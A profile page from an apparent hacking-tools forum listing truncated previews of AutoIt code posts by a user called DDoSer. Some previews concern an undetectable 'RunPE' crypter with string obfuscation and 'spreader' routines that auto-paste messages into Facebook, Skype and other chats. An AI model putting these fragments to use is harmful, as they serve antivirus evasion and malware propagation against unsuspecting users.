• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Recent content by DDoSer

  1. D

    AutoIT Encrypted RunPE #3 (FUD)

    Re: Encrypted RunPE #3 (FUD) If someone needs for it, dat is ShiftOneLove decryption and encryption methods: Encryption Input: sString - string for encrypting (not unicode, but u can use AscW) iNum - number of char shift >;Author: DDoSer ;level23hacktools.com Func...
  2. D

    AutoIT Encrypted RunPE #3 (FUD)

    [HIDE-THANKS]It use unique method "ShiftOneLove" with random generated number of char shift for each string and sure classical "StringReverse". String Reverse -> ShiftOneLove >;Encrypted by DDoSer ;level23hacktools.com Func _RunBinary($P30, $F31 = "", $F32 = @AutoItExe) ;#region 1...
  3. D

    AutoIT AutoitC - compile autoit to C++

    [HIDE-THANKS]========================================================================== AutoItC 0.1.0 (alpha) ========================================================================== WARNING: This is an Alpha Version. Several features may be missing or incomplete. Content of this file: 1...
  4. D

    AutoIT Just another SMTP UDF (wit attachments support)

    [HIDE-THANKS] >#AutoIt3Wrapper_Au3Check_Parameters=-d -w 1 -w 2 -w 3 -w 4 -w 5 -w 6 -w 7 ;~ #AutoIt3Wrapper_Run_Debug_Mode=Y ;(Y/N) Run Script with console debugging. Default=N #Region INCLUDE ;################################## ; Include ;##################################...
  5. D

    AutoIT FaceBook/Skype/ICQ/Steam/Raidcall/Omegle spreaders

    [HIDE-THANKS] >Func facebook($sMessage) $dll = DllOpen("user32.dll") Sleep(2) If _IsPressed("0D", $dll) and WinActive("Facebook -") = True Then ClipPut($sMessage) Send("^v{ENTER}") Sleep(1) ClipPut("") EndIf DllClose($dll) EndFunc ;==>FaceBook >Func skype($sMessage) $open =...
  6. D

    AutoIT Add Program to TarkBar and StartMenu (WinAPI)

    [HIDE-THANKS] >Func DeleteFromTaskBar($sFileLnk) Return _WinAPI_ShellExecute($sFileLnk,"","", "taskbarunpin") EndFunc Func AddToTaskBar($sFileLnk) Return _WinAPI_ShellExecute($sFileLnk,"","", "taskbarpin") EndFunc Func AddToStartMenu($sFileLnk) Return...
  7. D

    AutoIT Installed Software list - Ps + WMI + SCCM

    [HIDE-THANKS]Short Version: Grouped by Program >#RequireAdmin #include $iPid = run("powershell (Get-CimInstance -Namespace root\cimv2\sms -ClassName SMS_InstalledSoftware | fl ProductName,InstallDate,InstalledLocation,ProductVersion,UninstallString | out-string).trim()", "" , @SW_HIDE ...
  8. D

    AutoIT Startup Funcs. v2

    [HIDE-THANKS] >#include-once ; #AutoIt3Wrapper_Au3Check_Parameters=-d -w 1 -w 2 -w 3 -w- 4 -w 5 -w 6 -w 7 ; #INDEX# ======================================================================================================================= ; Title .........: _Startup ; AutoIt Version ...
  9. D

    AutoIT File to Base64 String Code Generator v1.20

    [HIDE-THANKS]Code is too long -> PasteBin[/HIDE-THANKS]
  10. D

    AutoIT [UDF] Simple & flexible multi-clients TCP server

    [HIDE-THANKS]Features: You can create multiples servers in one script Peers limit is optional (the real peers limit is your RAM and the maps performances) You can configure max data receive len (2nd argument of TCPRecv) on a per-client basis You can set an optional idle time-out (time...
  11. D

    AutoIT ControlClick + MouseClick for background or windowed mode windows

    [HIDE-THANKS] >Opt("MouseCoordMode", 2) Sleep(2000) MsClick("Window tittle","","","left",1,398, 349) ;Set window tittle for controlclick Sleep(2000) MsClick("Window tittle","","","left",1,398, 349) ; >> Func MsClick($tittle, $text, $controlid, $clickType, $clicks = 1, $x...
  12. D

    AutoIT Quickly Email False Positives to AV Vendors [Example]

    [HIDE-THANKS] >#RequireAdmin #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_UseUpx=y #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include "File.au3" #include #include #include #include #include...
  13. D

    AutoIT Operator 64

    [HIDE-THANKS]UDF: >; #INDEX# ====================================================================================================================== ; Title .........: operator64 ; AutoIt Version : 3.3.14.0 ; Language ......: English ; Description ...: Helper functions for basic maths...
  14. D

    AutoIT Local Proxy Server v0.12b

    Re: Local Proxy Server v0.12b Powerfull and configurable tool. P.S. I added an image.
  15. D

    Ripped Progress indicators collection [Total: 251] (.gif/.png)

    Here is Ripped Progress indicators from different sites and programms. Version (1.0.0. [20.09.2015]). Total: 251 [HIDE-THANKS]Download: DropBox Password: level23hacktools.com[/HIDE-THANKS]
Back
Top